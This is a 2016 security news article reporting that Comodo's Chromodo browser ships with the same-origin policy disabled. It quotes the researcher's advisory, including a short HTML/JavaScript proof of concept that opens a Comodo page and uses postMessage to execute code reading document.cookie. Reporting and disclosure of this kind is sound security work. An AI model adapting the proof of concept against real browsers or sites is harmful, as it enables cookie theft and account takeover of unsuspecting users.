Pierluigi Paganini February 03, 2016

Security Expert discovered that the Comodo Chromodo browser has ‘Same Origin Policy’ (SOP) disabled by default, if you are using it you are at risk.

Chromodo is the name of a free browser offered by the Comodo Antivirus firm, it is a customized version of Google’s Chrome browser developed to improve users’ security and privacy. Unfortunately this is not true, the Chromodo browser which is based on the Chromium open-source code is in fact affected by a serious security issue.

” The policy permits scripts running on pages originating from the same site – a combination of scheme, hostname, and port number – to access each other’s DOM with no specific restrictions, but prevents access to DOM on different sites.” reads Wikipedia.

Not implementing the Same Origin Policy, a code that runs on one website should be allowed to execute on another website with serious repercussions on the security perspective.

If you are using Chromodo, you must be aware that the browser has the same origin policy disabled.

“When you install Comodo Internet Security, by default a new browser called Chromodo is installed and set as the default browser. Chromodo is described as “highest levels of speed, security and privacy”, but actually disables all web security.” Ormandy wrote in a security advisory.

“Let me repeat that, they ***disable the same origin policy***…. ?!?.. To reproduce, do something like this:

<html>
<head></head>
<body>
<script>
function steal_cookie(obj)
{
    // Wait for the page to load
    setTimeout(function() {
        obj.postMessage(JSON.stringify({
            command: "execCode",
            code:    "alert(document.cookie)",
        }), "*");
    }, 2000);
}
</script>
<a href="javascript:steal_cookie(window.open('https://ssl.comodo.com/'))">Click Here</a>
</body>
</html>

With Same Origin Policy disabled an attacker can use a malicious script to perform a number of activities including taking over social media accounts and act on behalf of the victim.

Selling antivirus doesn’t qualify you to fork chromium, you’re going to screw it up. https://t.co/Dd0sqhRxwi #antivirus #wtf

— Tavis Ormandy (@taviso) 2 Febbraio 2016

Ormandy reported the issue Jan. 21 and, on Tuesday he revealed that Comodo tried to patch the issue in the Chromodo browser, in particular against an exploit he developed, but the fix doesn’t work.

Let’s wait for a definitive fix from the company.

Pierluigi Paganini

(Security Affairs –Chromodo, Same Origin Policy,)